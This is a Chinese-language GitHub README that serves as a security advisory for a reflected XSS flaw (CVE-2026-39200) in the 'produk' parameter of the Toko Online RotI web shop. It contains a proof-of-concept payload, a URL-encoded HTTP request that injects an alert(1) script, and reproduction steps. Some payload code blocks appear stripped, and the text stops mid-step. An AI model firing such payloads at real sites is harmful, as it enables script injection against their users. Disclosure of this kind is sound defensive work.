r00tali/CVE-2026-39200
GitHub: r00tali/CVE-2026-39200
该项目是针对 Toko Online RotI 应用 produk 参数反射型 XSS 漏洞(CVE-2026-39200)的完整安全公告与复现指南。
Stars: 0 | Forks: 0
# CVE-2026-39200 — Toko Online RotI 中的反射型跨站脚本 (XSS)
## 摘要
在 **Toko Online RotI** Web 应用程序的 `produk` 请求参数中发现了一个反射型跨站脚本 (XSS) 漏洞。该应用程序在将用户提供的输入反射到包含在双引号中的 HTML 标签属性之前,未能对其进行 HTML 编码。攻击者可以构造一个恶意 URL,当受害者访问时,会在受害者浏览器会话的上下文中执行任意 JavaScript。
| 字段 | 值 |
|---|---|
| **CVE ID** | CVE-2026-39200 |
| **漏洞类型** | CWE-79 — 网页生成时输入的不当中和处理(反射型 XSS) |
| **受影响产品** | Toko Online RotI(印尼在线商店) |
| **受影响参数** | `produk` |
| **发现者** | Uzair Ali (r00tali) — 渗透测试员 / Bug Bounty Hunter |
| **发现日期** | 2026-07-03 |
| **分配 CVE** | 2026-07-12 |
| **发布安全公告** | 2026-07-19 |
## 漏洞详情
`produk` 请求参数被原封不动地复制到由双引号括起来的 HTML 标签属性值中。由于应用程序在反射用户提供的输入之前未对其进行 HTML 编码,攻击者可以通过提交包含闭合双引号以及 HTML/JavaScript payload 的负载来跳出该属性。
### 概念验证 Payload
```
xbnw0">skc2h
```
当此 payload 作为 `produk` 参数提交时,应用程序会将输入**未经转义**地回显在响应中。闭合的 `">` 会终止原有属性,注入的 `` 块会被浏览器解析为新的 HTML 元素,从而在用户的会话中执行任意 JavaScript。
### 漏洞模式(概念性)
存在漏洞的 HTML 响应如下所示:
```
skc2h" />
^^^^^^^^^^^^^^^^^^^^^^^^
Browser executes this
```
### HTTP 请求(复现)
```
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0
```
### HTTP 响应(节选)
```
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
skc2h" />
```
## 复现步骤
1. 在 Toko Online RotI 应用程序中找到会将 `produk` 参数反射到 HTML 属性内的 endpoint(例如,产品搜索、详情或过滤页面)。
2. 将 `produk` 参数值替换为以下 payload:
xbnw0">skc2h
3. 向服务器提交请求。
4. 检查服务器的响应。该 payload 在属性内部被未经修改地回显,从而跳出 `"` 并在 DOM 中生成一个有效的 `